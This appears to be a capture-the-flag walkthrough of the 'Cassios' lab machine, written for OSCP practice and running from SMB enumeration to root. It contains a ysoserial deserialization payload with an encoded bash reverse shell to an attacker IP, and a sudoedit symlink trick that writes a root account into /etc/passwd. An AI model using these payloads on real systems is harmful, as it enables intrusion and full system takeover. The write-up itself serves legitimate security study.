Proving grounds:Cassios
5 min readDec 15, 2022
Today we will take a look at Proving grounds: Cassios. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
└─# nmap -Pn -p- -sS --min-rate 10000 -oN nmap/quick 192.168.200.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 11:51 EST
Warning: 192.168.200.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.200.116
Host is up (0.10s latency).
Not shown: 62245 closed tcp ports (reset), 3285 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy- smb (445)
└─$ smbmap -H 192.168.200.116
[+] IP: 192.168.200.116:445 Name: 192.168.200.116
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Samantha Konstan READ, WRITE Backups and Recycler files
IPC$ NO ACCESS IPC Service (Samba 4.10.4)─$ smbclient '//192.168.200.116\Samantha Konstan'
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Dec 15 11:52:50 2022
.. D 0 Thu Sep 24 13:38:10 2020
recycler.ser N 0 Wed Sep 23 21:35:15 2020
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020- 8080
└─# feroxbuster --url http://192.168.200.116/ -w /usr/share/wordlists/dirb/big.txt
http://192.168.200.116/backup_migrate => http://192.168.200.116/backup_migrate/
─# tar -xvf recycler.tar
Here we find the username and password for login.
─# cat src/main/java/com/industrial/recycler/WebSecurityConfig.java
When we check the options here, we see that the size of the file in smb has changed.
Before
─$ smbclient '//192.168.200.116\Samantha Konstan'
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Dec 15 11:52:50 2022
.. D 0 Thu Sep 24 13:38:10 2020
recycler.ser N 0 Wed Sep 23 21:35:15 2020
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020After
smb: \> ls
. D 0 Thu Dec 15 11:52:50 2022
.. D 0 Thu Sep 24 13:38:10 2020
recycler.ser N 146 Thu Dec 15 11:56:14 2022
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020If we look carefully at the code, we can see the related file
Download a look at the file.
smb: \> mget recycler.ser
Get file recycler.ser? y
getting file \recycler.ser of size 146 as recycler.ser (0.4 KiloBytes/sec) (average 21.4 KiloBytes/sec)
smb: \> exit
└─$ file recycler.ser
recycler.ser: Java serialization data, version 5Let’s explore Java serialization data, version 5
I used it.
- RCE
Let’s prepare our payload.
└─# java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjIwMC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" > recycler.serYou can delete the file and insert our own.
smb: \> del recycler.ser
smb: \> put recycler.ser
putting file recycler.ser as \recycler.ser (12.6 kb/s) (average 12.6 kb/s)
smb: \> ls
. D 0 Thu Dec 15 11:59:07 2022
.. D 0 Thu Sep 24 13:38:10 2020
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020
recycler.ser A 3625 Thu Dec 15 11:59:07 2022
8374272 blocks of size 1024. 6446888 blocks availableLet’s check again and get a shell.
script /dev/null -c bash
export TERM=xterm
Ctrl + z
stty raw -echo ; fg
Don't forget to do this.- Privesc (sudo)
When we check the privileges, we see that we can edit the file with sudoedit. Let’s look at the version of sudo to use it.
[samantha@cassios /]$ sudo -V
sudo -V
Sudo version 1.8.14
Sudoers policy plugin version 1.8.14
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.14We found an exploit that matches the version
I will use this part
First, let’s make the hash
└─# openssl passwd -1 -salt hacker pass123
$1$hacker$zVnrpoW2JQO5YUrLmAs.o1Now let’s exploit
[samantha@cassios ~]$ mkdir -p /home/samantha/exploit
[samantha@cassios ~]$ ln -sf /etc/passwd /home/samantha/exploit/recycler.ser
[samantha@cassios ~]$ sudoedit /home/samantha/exploit/recycler.ser
\\ Note
\\ Add hash
\\ hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash
[samantha@cassios ~]$ su hacker
Password:
[root@cassios samantha]# whoami
rootAnd now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
